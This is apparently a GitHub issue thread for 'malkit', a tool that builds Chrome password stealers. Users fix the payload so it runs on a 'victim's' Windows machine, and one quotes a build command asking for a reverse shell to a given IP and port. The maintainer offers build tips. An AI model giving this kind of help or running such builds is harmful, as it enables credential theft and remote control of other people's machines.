Open oxide232 opened 4 years ago
Oh thank you for reminding me! I'll update that when I have time
Hi ,I found in win10 . when click the server_ip.exe . it will show lack of sqlite3. only I copy a splite3.dll under victim's system32 directory. the payload can execute success.
Huh thanks for catching that. If you compile it in a conda environment I think it will work, it's a bug with the pexe37. Will try to fix that when I have time
Hi, reverse shell seems not be implemented I receive this message: (malkit) PS C:\Users\xxxx\malkit> python malkit.py build_chromepass --reverse_shell --host 192.168.15.135 --port 4444 Not implemented yet but it's easier than email... A copy paste will work, adding after rest is working (malkit) PS C:\Users\xxx\malkit>